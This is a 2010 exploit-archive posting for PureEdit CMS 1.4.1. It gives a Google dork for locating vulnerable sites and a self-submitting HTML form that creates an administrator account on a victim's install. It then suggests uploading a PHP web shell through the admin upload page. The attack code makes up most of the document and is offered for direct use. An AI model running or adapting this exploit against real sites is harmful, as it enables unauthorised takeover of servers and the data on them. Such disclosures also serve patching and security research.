PureEdit 1.4.1 Account Creation Vulnerability
Posted on 23 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PureEdit 1.4.1 Account Creation Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= PureEdit 1.4.1 Account Creation Vulnerability ============================================= # Exploit Title: PureEdit 1.4.1 Account Creation Vulnerability # Date: 22/08/2010 # Author: pimpim # Software Link: http://www.pureedit.com/download/index.php?version=1.4.1 # Version: 1.4.1 # Category:: webapps # Google dork: intext:"Powered by PureEdit" # Tested on: Linux # #The PureEdit CMS has got a design flaw that allows anybody to create admin accounts. #Note: The default admin directory is called pe-admin #Note2: When you have created your account, then you can go to #[admin]/centers/uploads.center.php and upload a php-shell <html> <body> <form action="http://[victim]/[admin-directory]/centers/accounts.center.php" method="POST"> <input type="hidden" name="id" value="0"/> <input type="hidden" name="title" value="hack"/> <input type="hidden" name="email" value="hack@exploit.org"/> <input type="hidden" name="website" value="http://www.inj3ct0r.com"/> <input type="hidden" name="username" value="hacker"/> <input type="hidden" name="password" value="passwd"/> </form> <script> document.forms[0].submit(); </script> </body> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>